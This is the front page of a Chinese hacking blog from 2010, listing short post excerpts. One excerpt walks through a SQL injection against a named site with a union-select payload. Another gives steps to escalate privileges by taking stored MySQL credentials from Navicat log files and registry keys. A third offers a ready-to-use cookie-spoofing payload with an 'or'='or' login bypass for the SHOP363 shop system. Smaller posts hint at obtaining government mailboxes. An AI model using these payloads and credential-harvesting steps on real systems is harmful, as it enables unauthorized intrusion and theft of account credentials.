凌风[0x0F]'s BloG

Enjoy In Hacking

黑客在线工具 联系方式 移到底部 登录

我的主页

移动渗透之N810

BHST有人用的东西,我看图不行,就把图收拾好,转我BLOG里了

0x0F 于2010年8月7日 发自 技术文章 阅读 | 对话 | 收藏

搜索排名又创新高

0x0f: 百度第二 谷歌第四
l14of:当然都是第一
凌风:哎,,不说了。。。。

0x0F 于2010年8月7日 发自 杂七杂八 阅读 | 对话 | 收藏

[原创]帮朋友搞一棒子站手记

我一开始用 and 1=1 和and 1=2 测试,发现结果是一样的,本以为没有注入,又用 having 1=1-- 和 having 1=2-- 这才发现有注入,便开始了下一步渗透,
用order by判断出字段数为2
构造如下语句
http://www.l14of.com/hex.php?page=product&id=120 and 1=2 union select 1,2
返回正常,显示出字段位置
用手工简单的爆破了下
...
0x0F 于2010年8月7日 发自 技术文章 阅读 | 对话 | 收藏

国外各种HACK站=NB

这篇文章是俺的个人用文章,要密码的。。。嘿嘿嘿嘿。。。输密码就进了
此文章需要普通级别密码!

0x0F 于2010年8月5日 发自 杂七杂八 阅读 | 对话 | 收藏

各种GOV.CN的邮箱申请

你们懂的。。。

0x0F 于2010年7月29日 发自 杂七杂八 阅读 | 对话 | 收藏

QQ2010SP1(版本号1760)有巨大漏洞

http://hi.baidu.com/hnaker/blog/item/3ff5633d46918ff7828b1387.html

 

0x0F 于2010年7月28日 发自 漏洞发布 阅读 | 对话 | 收藏

SQL构造having语句暴字段

新方法SQL注入

0x0F 于2010年7月26日 发自 技术文章 阅读 | 对话 | 收藏

利用navicat提权

navicat是一个比较流行的MySQL管理工具,在很多服务器上都可以找到

有两个方法提权:

1、从日志文件里找密码,navicat会把操作日志(比如加账户)保存到My Documents\Navicat\MySQL\logs下的LogHistory.txt,低版本是安装目录下的logs下LogHistory.txt

2、navicat管理的MySQL服务器信息(一般是root帐户)是存在注册表里的,具体是HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers下,导出注册表导入到本机然后星号察看就OK了。。
...

0x0F 于2010年7月26日 发自 漏洞发布 阅读 | 对话 | 收藏

SHOP363网店系统通杀漏洞

COOKIES欺骗,下面的是COOKIES利用代码:


Sy%5FShops=TFlags=1%2C2%2C3%2C4%2C5%2C11%2C12%_2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C21%2C22%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C41%2C42%2C43%_2C44%2C51%2C52%2C53%2C54%2C55%2C56%2C61%2C62%2C63%2C64&AdminoldFlags=1&Truename=%CE%_DE&AdminFlags=1&AdminPassword='or'='or'&AdminName='or'='or';

...
0x0F 于2010年7月26日 发自 漏洞发布 阅读 | 对话 | 收藏

dedecms5.6注入漏洞分析与利用

转自xhming

0x0F 于2010年7月25日 发自 漏洞发布 阅读 | 对话 | 收藏

博主:0x0F

专注于WEB安全,寻志同道合的朋友一起交流技术。QQ:unMD5(50a9780c2be657b465f74e56f1d6e429)

腾讯微博

<123456789>
返回顶部↑